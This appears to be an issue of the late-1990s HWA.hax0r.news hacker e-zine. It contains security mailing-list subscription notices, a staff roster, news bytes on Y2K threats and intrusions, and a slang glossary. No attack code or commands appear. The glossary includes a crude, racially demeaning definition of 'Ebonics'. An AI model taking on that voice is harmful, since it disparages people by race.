~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps Folks from #hwa.hax0r,news and #fawkerz, and other leet secret channels, mad props! ... ;-) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick Kevin is due to be released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ kewl sites: + http://blkops.venomous.net/ NEW + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ FBI Investigating 20 Y2K threats The FBI said Thursday it had moved to thwart up to 20 or so possible threats against targets such as power plants and computer networks during a heightened security watch that started before 2000 dawned. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop ++ L0pht joins e-security firm L0pht Heavy Industries to serve as research and development arm for new company hoping to secure e-commerce. CAMBRIDGE, Mass. - Armed with $10 million in venture fonding and a phalanx of Internet industry veterans, startup firm AtStake Inc. on Thursday announced plans to help secure the e-commerce revolution. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2417831,00.html?chkpt=zdnntop Read the dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4054 ++ Microsoft under media attack in China Software giant Microsoft Corp. has run into more bad publicity in China with a newspaper reporting that its latest Windows 2000 operating system will be barred throughout the government. Instead, ministries would use "Red Flag-Linux," a new software platform developed by Chinese researchers and based on upstart operating system Linux. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2417828,00.html Read the dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4141 ++ China will handle piracy Unless pirates won't hand in all their illegal audio- and DVD-copies before January, 15th, the Chinese authorities will take measures. Pirates may then expect heavy penalties. Read the (short) dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4140 ++ Y2K-patch crashes important flight controle systems Representatives of the American union Professional Airway Systems Specialists (PASS) claim that important flight controle systems crashed because of a Y2K-patch installed by the Federal Aviation Administration (FAA). Because of this, airplanes weren't able to take off at the East side of the US. Read the dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4137 ++ Clinton declares war on cyberterrorists WASHINGTON - The White House planned to announce on Friday new steps to protect America's computer systems from hackers and viruses. These steps also include education subsidies for college students if they agree to work for the government after developing computer-security skills. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2418619,00.html?chkpt=zdnntop ++ Teen hacks 27 ISPs, gains root access A 16-year-old hacker affiliated with the cybergang known as Global Hell compromised at least 27 Internet service providers late last year, stealing passwords and, in some cases, destroying data, according to details of a police investigation released Monday. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop ++ Data thief blackmails e-tailer eUniverse (an online retailer) confirmed monday that it was the victim of a data theft and virtual blackmail attempt over the weekend. A 19-year-old Russion hacker blackmailed CD Universe into paying $100 000, otherwise he would publish thousands of credit card codes on the net, and so he did. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2419750,00.html Read the dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4173 ++ Reno rallies cybercrime fighters U.S. Attorney General Janet Reno on Monday outlined plans for the federal government to battle all cybercrime by teaming up with U.S. states to establish a secure online information clearinghouse. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2419984,00.html Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon?) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Hey, the world didn't end at 23:59 12/31/99 wow huh? * well i've been busy so you're getting more than two weeks worth * of news in one issue. Sorry if this doesn't waggle yer wig but * I decided it would be better than releasing two issues again. * * This issue sports a few interviews with underground figures * if there is anyone that you'd like interviewed or want to * offer yourself up, email me and we'll work something out,or * at least try to. Meanwhile, enjoy the issue and tty next time * * This issue: fuqrag, ytcracker and mosthated. * * Cruci * * cruciphux@dok.org * ICQ:58939315 note; not always online, do not abuse! * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 www.2600.com, jokers to the end? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ On New Year's Day visitors to the venerable 2600.com site were greeted with the following: Internal Server Error The date specified (01-01-1900) is impossible. If you have forced this error condition, you may be in violation of state, federal, and/or civil laws. Those outside the United States should check with their respective governments concerning their country's extradition treaty. Dissemination of this error is also strictly prohibited. If you believe you have received this message in error, please reload the page and try again. -=- It looks realistic but we're pretty sure that it was not generated by the server and is actually a phake error message... - Ed @HWA 04.0 More irc4all proxies (01/03/00) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The info from below is taken from the site located at http://www.lightspeed.de/irc4all/ it offers an up to date list of various proxies, mostly public, some not, check it out for further details. - 